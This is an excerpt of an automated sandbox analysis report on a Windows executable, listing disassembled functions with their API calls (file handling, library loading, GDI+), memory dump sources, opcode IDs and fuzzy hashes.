                                                                                                                    Function 00B8966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00B89F27,?,?,00B8771A), ref: 00B896E6
                                                                                                                    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00B89F27,?,?,00B8771A), ref: 00B89716
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: 9eb224733f33bd1d5ed1e0b524963d804b3ea095690d51bfb52a47da72a87655
                                                                                                                    • Instruction ID: 92ae95327e76ec963c17ce6743e15317f4a36564757e1aeaf45ff0290fc6707f
                                                                                                                    • Opcode Fuzzy Hash: 9eb224733f33bd1d5ed1e0b524963d804b3ea095690d51bfb52a47da72a87655
                                                                                                                    • Instruction Fuzzy Hash: 7521E071000344AFE730AA65CC89BB777DCEB49320F140A58F995C21E1D7B4A884C731
                                                                                                                    Function 00B89E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00B89EC7
                                                                                                                    • GetLastError.KERNEL32 ref: 00B89ED4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2976181284-0
                                                                                                                    • Opcode ID: 63cb0d565d92f2387d901605517a0d01f87f5e90b609297fedd28389f8d6debe
                                                                                                                    • Instruction ID: 01470ff0853df5e9ad3a806f5d91f82b435cfa1c752b13a450ef8a92aba8e60c
                                                                                                                    • Opcode Fuzzy Hash: 63cb0d565d92f2387d901605517a0d01f87f5e90b609297fedd28389f8d6debe
                                                                                                                    • Instruction Fuzzy Hash: 6011E931600700DBDB34EA28C885BB6BBE9EB45361F544AA9E552D29F0D770ED49C760
                                                                                                                    Function 00BA8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00BA8E75
                                                                                                                      • Part of subcall function 00BA8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BACA2C,00000000,?,00BA6CBE,?,00000008,?,00BA91E0,?,?,?), ref: 00BA8E38
                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00BC1098,00B817CE,?,?,00000007,?,?,?,00B813D6,?,00000000), ref: 00BA8EB1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocAllocate_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2447670028-0
                                                                                                                    • Opcode ID: 4e8bc30beb0c4f8e4d65018e29e60ad5ad8b063c58f60a5e40a7c824df07c032
                                                                                                                    • Instruction ID: 0254f6782264f57dbb10f0b74d276d932e615cc3ffb1290e14b0ced282a9c7d1
                                                                                                                    • Opcode Fuzzy Hash: 4e8bc30beb0c4f8e4d65018e29e60ad5ad8b063c58f60a5e40a7c824df07c032
                                                                                                                    • Instruction Fuzzy Hash: C8F0F63260D101FACB212B25AC04B6F7BD8CF93B70F2401E5F814AB991DF70CD0185A0
                                                                                                                    Function 00B9109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 00B910AB
                                                                                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 00B910B2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1231390398-0
                                                                                                                    • Opcode ID: 2cd23486d6527acaf70b48dd7b732c8ef0bf5b8bf84fbb566a71033a0d1ee838
                                                                                                                    • Instruction ID: 60c75ba471a50c3bc26ccd8e8ffd6f2ea5dd795dbfd474ee985cb2b29bf7112f
                                                                                                                    • Opcode Fuzzy Hash: 2cd23486d6527acaf70b48dd7b732c8ef0bf5b8bf84fbb566a71033a0d1ee838
                                                                                                                    • Instruction Fuzzy Hash: 0CE0D832F0014AA7DF0997B89C059EB73DDEA4420431485B6E403D3101F971DE415660
                                                                                                                    Function 00B8A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B8A325,?,?,?,00B8A175,?,00000001,00000000,?,?), ref: 00B8A501
                                                                                                                      • Part of subcall function 00B8BB03: _wcslen.LIBCMT ref: 00B8BB27
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B8A325,?,?,?,00B8A175,?,00000001,00000000,?,?), ref: 00B8A532
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2673547680-0
                                                                                                                    • Opcode ID: 2441f51d560023af3d8c187e2baf03f7776ec3e3475e47e609ab01068b943cf3
                                                                                                                    • Instruction ID: b90464f19a13f0bf596534b8381d8866cb40ef2bb19a462c04aba69f13260abb
                                                                                                                    • Opcode Fuzzy Hash: 2441f51d560023af3d8c187e2baf03f7776ec3e3475e47e609ab01068b943cf3
                                                                                                                    • Instruction Fuzzy Hash: D5F03932240209BBEF017F60DC85FDA37ACEF15785F8880A1B949D6164DB71DAD9EB50
                                                                                                                    Function 00B8A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,00B8977F,?,?,00B895CF,?,?,?,?,?,00BB2641,000000FF), ref: 00B8A1F1
                                                                                                                      • Part of subcall function 00B8BB03: _wcslen.LIBCMT ref: 00B8BB27
                                                                                                                    • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00B8977F,?,?,00B895CF,?,?,?,?,?,00BB2641), ref: 00B8A21F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2643169976-0
                                                                                                                    • Opcode ID: 57af289b6a3aa75f9b468679292e28106d5f4abdc9f90697e64fcb2f8fa7b2a6
                                                                                                                    • Instruction ID: 54863c2624f80754e369338bd505433dccdb14bb1c1a8eef57d72ea7adc9d0ef
                                                                                                                    • Opcode Fuzzy Hash: 57af289b6a3aa75f9b468679292e28106d5f4abdc9f90697e64fcb2f8fa7b2a6
                                                                                                                    • Instruction Fuzzy Hash: B8E092311442096BEB11AF60DC85FD977ECEF08781F4840A1B944D2060EF61DE84DB50
                                                                                                                    Function 00B9AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00BB2641,000000FF), ref: 00B9ACB0
                                                                                                                    • CoUninitialize.COMBASE(?,?,?,?,00BB2641,000000FF), ref: 00B9ACB5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3856339756-0
                                                                                                                    • Opcode ID: 78b42f27efeae3fc65c9f6bfdbfc155eedc295e10b728a4b2d336a51b3ad6325
                                                                                                                    • Instruction ID: 5f40ce0e2f1141180553c2a5acd260bdb85058fba3c6cb6ff5f0f6506e3455d7
                                                                                                                    • Opcode Fuzzy Hash: 78b42f27efeae3fc65c9f6bfdbfc155eedc295e10b728a4b2d336a51b3ad6325
                                                                                                                    • Instruction Fuzzy Hash: DFE03972604650EBCA019B58DC46B49FBE8FB88B20F00436AA416937A0CB74A800CA90
                                                                                                                    Function 00B8A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00B8A23A,?,00B8755C,?,?,?,?), ref: 00B8A254
                                                                                                                      • Part of subcall function 00B8BB03: _wcslen.LIBCMT ref: 00B8BB27
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00B8A23A,?,00B8755C,?,?,?,?), ref: 00B8A280
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2673547680-0
                                                                                                                    • Opcode ID: ef0ea2062df6e58a7e65fe49b98c05d13a852d87880d8ba0ee0db017efac1819
                                                                                                                    • Instruction ID: e9405b5adf7ce68e8c83f91662f895f44cc068ef84467ba573f789ca8159a2a8
                                                                                                                    • Opcode Fuzzy Hash: ef0ea2062df6e58a7e65fe49b98c05d13a852d87880d8ba0ee0db017efac1819
                                                                                                                    • Instruction Fuzzy Hash: 2AE092315001249BDF20BB64CC45BD9B7E8EB087E1F0442A1FD54E31A0DB70DE44CBA0
                                                                                                                    Function 00B9DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 00B9DEEC
                                                                                                                      • Part of subcall function 00B84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B840A5
                                                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 00B9DF03
                                                                                                                      • Part of subcall function 00B9B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B9B579
                                                                                                                      • Part of subcall function 00B9B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B9B58A
                                                                                                                      • Part of subcall function 00B9B568: IsDialogMessageW.USER32(0001040E,?), ref: 00B9B59E
                                                                                                                      • Part of subcall function 00B9B568: TranslateMessage.USER32(?), ref: 00B9B5AC
                                                                                                                      • Part of subcall function 00B9B568: DispatchMessageW.USER32(?), ref: 00B9B5B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2718869927-0
                                                                                                                    • Opcode ID: 7372f5e9f480c6ddf91293e391655e46c113ab5454bb998660e8aa0d5aabcd13
                                                                                                                    • Instruction ID: abd93056080cca48fe21ae8402bb56df656955d6260b7cbf5eb1701adf3904c3
                                                                                                                    • Opcode Fuzzy Hash: 7372f5e9f480c6ddf91293e391655e46c113ab5454bb998660e8aa0d5aabcd13
                                                                                                                    • Instruction Fuzzy Hash: 29E09B7140424866DF01B760DC06F9F3BEC5B05785F040495B640DB1B2DE74D6108761
                                                                                                                    Function 00B9081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B90836
                                                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B8F2D8,Crypt32.dll,00000000,00B8F35C,?,?,00B8F33E,?,?,?), ref: 00B90858
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1175261203-0
                                                                                                                    • Opcode ID: 62c06c5e9b3db75cd455ceb9087fd5b7285c87508ec550d015cc6a8778731603
                                                                                                                    • Instruction ID: 58e1fa29d39f20864d755cead5fd9fe6fa3578b1ed865af951dce29c4c358a43
                                                                                                                    • Opcode Fuzzy Hash: 62c06c5e9b3db75cd455ceb9087fd5b7285c87508ec550d015cc6a8778731603
                                                                                                                    • Instruction Fuzzy Hash: A1E01276504118ABDF11B7A49C45FDA77ECEF09791F4400B57645D2104DAB4DA84CBA0
                                                                                                                    Function 00B9A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B9A3DA
                                                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00B9A3E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1918208029-0
                                                                                                                    • Opcode ID: d212d97e786e4d7b0d62c27a92219b463e4d192304598a15f56fd7e32793daf5
                                                                                                                    • Instruction ID: 19223c38242625f072777a51904cd1da807b329d32c54cd4746a809f273a7c98
                                                                                                                    • Opcode Fuzzy Hash: d212d97e786e4d7b0d62c27a92219b463e4d192304598a15f56fd7e32793daf5
                                                                                                                    • Instruction Fuzzy Hash: B8E0ED71504218EBCB10DF55C541799BBE8EB04360F20C4AAA85693201E7B4AE04DB91
                                                                                                                    Function 00BA2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BA2BAA
                                                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00BA2BB5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1660781231-0
                                                                                                                    • Opcode ID: 499a5cde2f8de7f70cb65316586b9196ca5bfa8f7295f3849afabfa17bc8556b
                                                                                                                    • Instruction ID: e1b723cc84983fa88a22a090afc9199883e7a21d5e3fe1884cc8a04a248da1ce
                                                                                                                    • Opcode Fuzzy Hash: 499a5cde2f8de7f70cb65316586b9196ca5bfa8f7295f3849afabfa17bc8556b
                                                                                                                    • Instruction Fuzzy Hash: 7DD0A93829C3046B6C142B7D2A0258823C9ED43B707E042DAF821968E2EE508040A031
                                                                                                                    Function 00B812F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemShowWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3351165006-0
                                                                                                                    • Opcode ID: a494df2f6ccb9bc163ff020f991d9f79738d3063fe92c9b977e674051e2e2896
                                                                                                                    • Instruction ID: f8e1327dea0bb86d47dc2b230bee990138279419a97f2ce03558129641e88afc
                                                                                                                    • Opcode Fuzzy Hash: a494df2f6ccb9bc163ff020f991d9f79738d3063fe92c9b977e674051e2e2896
                                                                                                                    • Instruction Fuzzy Hash: 28C0123205C280BECB010BB4DC0DC2BBBE8ABA5712F04C90CB0A5D2060CA38C150DB12
                                                                                                                    Function 00B81A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: b50d7c86b106402c290cb9f621d7b6fc4acc4146e71bd445599e9b23636de691
                                                                                                                    • Instruction ID: 66d25f24acc9290956aeccc197debd05b50b33edcab76f05c2d258e1925b7294
